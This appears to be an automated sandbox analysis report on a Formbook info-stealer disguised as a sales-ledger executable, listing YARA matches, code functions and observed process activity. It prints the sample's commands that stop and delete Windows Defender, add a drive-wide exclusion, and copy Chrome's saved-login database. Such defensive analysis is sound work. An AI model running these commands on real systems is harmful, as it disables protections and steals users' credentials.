Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1D55 24_2_012C1D55
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C25DD 24_2_012C25DD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120841F 24_2_0120841F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BD466 24_2_012BD466
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1FF1 24_2_012C1FF1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012CDFCE 24_2_012CDFCE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01216E30 24_2_01216E30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BD616 24_2_012BD616
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2EF7 24_2_012C2EF7
Source: C:\Windows\explorer.exe Code function: 25_2_061C5A72 25_2_061C5A72
Source: C:\Windows\explorer.exe Code function: 25_2_061C8ABB 25_2_061C8ABB
Source: C:\Windows\explorer.exe Code function: 25_2_061C0B20 25_2_061C0B20
Source: C:\Windows\explorer.exe Code function: 25_2_061C0B22 25_2_061C0B22
Source: C:\Windows\explorer.exe Code function: 25_2_061BC072 25_2_061BC072
Source: C:\Windows\explorer.exe Code function: 25_2_061BC06D 25_2_061BC06D
Source: C:\Windows\explorer.exe Code function: 25_2_061C4882 25_2_061C4882
Source: C:\Windows\explorer.exe Code function: 25_2_061BDCF2 25_2_061BDCF2
Source: C:\Windows\explorer.exe Code function: 25_2_061BDCF0 25_2_061BDCF0
Source: C:\Windows\explorer.exe Code function: 25_2_061C3152 25_2_061C3152
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8D466 32_2_04D8D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD841F 32_2_04CD841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D925DD 32_2_04D925DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDD5E0 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91D55 32_2_04D91D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92D07 32_2_04D92D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC0D20 32_2_04CC0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92EF7 32_2_04D92EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8D616 32_2_04D8D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE6E30 32_2_04CE6E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9DFCE 32_2_04D9DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91FF1 32_2_04D91FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D928EC 32_2_04D928EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB090 32_2_04CDB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D920A8 32_2_04D920A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81002 32_2_04D81002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9E824 32_2_04D9E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCF900 32_2_04CCF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE4120 32_2_04CE4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D922AE 32_2_04D922AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FA2B 32_2_04D7FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D803DA 32_2_04D803DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8DBD2 32_2_04D8DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFEBB0 32_2_04CFEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAB40 32_2_04CEAB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92B28 32_2_04D92B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2E3A2 32_2_02B2E3A2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2EB37 32_2_02B2EB37
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B19E3E 32_2_02B19E3E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B19E40 32_2_02B19E40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B12FB0 32_2_02B12FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2E41B 32_2_02B2E41B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B12D90 32_2_02B12D90
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: String function: 011FB150 appears 48 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04CCB150 appears 66 times
PE file contains strange resources
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314971887.00000000029BF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324334005.00000000076A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSycdovrq.dll" vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.323803137.00000000074B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000000.311950591.00000000007A8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375859659.000000000147F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378517009.0000000001659000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Uses 32bit PE files
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/14@2/1
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 9_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 13_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 9_2_004095FD
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 9_2_0040A33B
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 9_2_00401306
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Jump to behavior
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File read: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\ Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File written: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: Require your Sales Ledger from 01-April-2020.exe, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Yara detected Costura Assembly Loader
Source: Yara match File source: Require your Sales Ledger from 01-April-2020.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300, type: MEMORY
Source: Yara match File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, type: DROPPED
Source: Yara match File source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
